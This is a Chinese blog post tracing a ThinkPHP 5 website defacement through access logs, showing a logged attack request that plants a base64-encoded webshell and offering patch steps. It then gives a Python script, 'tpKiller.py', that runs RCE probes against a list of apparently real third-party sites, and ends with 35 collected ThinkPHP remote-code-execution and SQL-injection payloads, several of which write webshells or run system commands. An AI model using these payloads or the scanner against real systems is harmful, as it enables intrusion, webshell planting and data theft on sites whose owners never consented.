记录一个基于ThinkPHP网站被入侵到溯源的过程

昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作

HACKER

知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。

0x01 下载必要文件

首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。

0x02 日志分析

从网站首页被篡改,可知道攻击者应该拿下了网站的权限,并上传了 webshell,因此从攻击日志中查找网站非常规的访问URL记录。

发现如下的访问日志:

203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/result.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/result.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/read.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/read.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/flye.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/flye.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/moon.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //api.php HTTP/1.1" 301 178 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /api.php HTTP/1.1" 404 564 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lequ.php HTTP/1.1" 301 178 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lequ.php HTTP/1.1" 404 564 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lx.php HTTP/1.1" 301 178 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lx.php HTTP/1.1" 404 564 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //sb.php HTTP/1.1" 301 178 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "http://pay.top15.cn//install/sss1.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

看到这样的访问日志,很明显这是一个扫描器在扫描网站是否存在 webshell

查询ip:

机房扫描

可知,这是放在服务器上的扫描器

继续往下分析,时间顺序是从上往下增加的。

然后又发现一处集中扫描网站备份文件的日志记录:

117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /index.php?s=hits-show&sid=md5(1)%23&type=md5(1) HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

查询IP结果如下:

第二处攻击记录IP信息

想不到,小小的站点,攻击的人还挺多的,但是这些扫描基本都是徒劳的,网站上不存在这些内容,所以也不存在什么威胁(之后的几处地方也存在类似的扫描记录,正常访问的用户不多,倒是扫描器挺多的…⊙﹏⊙b汗)

网站的首页被改成了一串中文,那么在访问日志当中应当是存在的

在下载的网站文件/public 目录下,发现如下情况

攻击文件

index.phpi.php,乍一看,第二个文件很明显是 webshell 文件,然后到访问日志中,查找 i.php这个关键词

i.php

OK,成功定位攻击日志

很明显,攻击者在简单访问几次后,便直接使用了0day攻击,系统基于 ThinkPHP5.0,因此由最近爆出的ThinkPHP几个RCE漏洞,可知攻击者直接利用了该漏洞。

113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0KJHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0KZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

定位攻击者

这个定位不是特别准确,但是也差不了多少了,真人概率 92%,可以确定攻击者使用的应该是自家的电脑。


0x03 修复工作

既然是最新的漏洞攻击,之前也挺热的,毕竟让程序员加班几次了。

关于漏洞的分析,推荐文章《ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析

通过该文章的分析,在源码中发现该程序基于 TP5.0,那么修复方法有其一,修改默认的 'var_pathinfo' => 's',把s 修改成复杂的字符串,这个在thinkphp/convention.php文件中

其二,升级官方最新版本

其三,在 thinkphp/library/think/App.php 类的 module 方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

0x04 写一个EXP:

简单写了一个 exploit

# -*- coding:utf-8 -*-
# name:tpKiller.py
# author: DYBOY
# description: ThinkPHP5 RCE的POC
# time: 2019-02-16

import requests
import re


"""
5.0.21,5.0.22:
写shell:http://example.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php @assert($_POST);?>

5.1.*:
写shell:http://example.com/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php @assert($_POST);?>

"""
# 检测存在漏洞的网址列表
target_urls =[
    'http://www.test.com',
    'http://www.meetppt.com',
    'http://www.jiyouche.com',
    'http://www.dfqy.com',
    'http://home.chegouguanjia.com',
    'http://www.aixuetuan.com'
    ]

# payload列表
poc_list = [
    '/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=index/\think\Request/input&filter=phpinfo&data=1',
    ]

def getHtml(url):
    """
    获取网页内容
    param: url
    return str
    """
    html = requests.get(url)
    html.encoding = 'utf-8'
    return html.text

def checkBug(url):
    """
    验证是否存在RCE漏洞
    param: url
    return None
    """
    for index,poc in enumerate(poc_list):
        result = getHtml(url+poc)
        if(result.find('www.php.net') > 0):
            print("当前URL:"+ url+" 存在ThinkPHP5 RCE 漏洞!\nPOC编号: "+str(index+1))
            break

def attack(urlList):
    """
    开始检测
    param:urls(<type:list>)
    return None
    """
    for url in urlList:
        checkBug(url)

# 主程序
if __name__ == '__main__':
    attack(target_urls)

0x05 总结

12月份就爆出 ThinkPHPRCE 漏洞,年底,许多公司都在忙着财务、公司年会等事情,缺少了对网站安全的一个检查维护,却不知道,在网上一些“黑客”或者“黑产团队”已经开始了批量获取webshell的入侵等违法活动,因此各大公司或是个人站长,都需要时刻关注互联网安全动态,及时做好安全防护升级工作。

0x06 附整合POC

来源 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

# thinkphp-RCE-POC</br>

官方公告:</br>
1、https://blog.thinkphp.cn/869075</br>
2、https://blog.thinkphp.cn/910675</br>

POC:</br>
# thinkphp 5.0.22</br>
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username</br>
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password</br>
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id</br>
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1</br>
# thinkphp 5</br>
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1</br>
# thinkphp 5.0.21</br>
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id</br>
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1</br>
# thinkphp 5.1.*</br>
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1</br>
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd</br>
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E</br>
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E</br>
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1</br>
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd</br>
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1</br>
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd</br>
# 未知版本</br>
16、?s=index/\think\module/action/param1/${@phpinfo()}</br>
17、?s=index/\think\Module/Action/Param/${@phpinfo()}</br>
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}</br>
19、index.php?s=/home/article/view_recent/name/1' </br>
    header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"</br>
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27</br>
21、index.php?s=/home/shopcart/getpriceNum/id/1%27</br>
22、index.php?s=/home/user/cut/id/1%27</br>
23、index.php?s=/home/service/index/id/1%27</br>
24、index.php?s=/home/pay/chongzhi/orderid/1%27</br>
25、index.php?s=/home/pay/index/orderid/1%27</br>
26、index.php?s=/home/order/complete/id/1%27</br>
27、index.php?s=/home/order/complete/id/1%27</br>
28、index.php?s=/home/order/detail/id/1%27</br>
29、index.php?s=/home/order/cancel/id/1%27</br>
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+</br>
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1</br>
    Content-Disposition: form-data; name="couponid"</br>
    1') union select sleep('''+str(sleep_time)+''')#</br>
# thinkphp 5.0.23(完整版)debug模式</br>
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx</br>
# thinkphp 5.0.23(完整版)</br>
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al</rb>
# thinkphp 5.0.10(完整版)</br>
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system</rb>
# thinkphp 5.1.* 和 5.2.* 和 5.0.*</br>
35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
发表评论 / Comment

用心评论~

金玉良言 / Appraise
张sirLV 1
2019-03-30 22:03
请问大侠,文中的ip地址查询用的哪个网站啊?
头像
DYBOY站长已认证
2019-04-16 11:04
@张sir:http://www.dyboy.cn/post-2112.html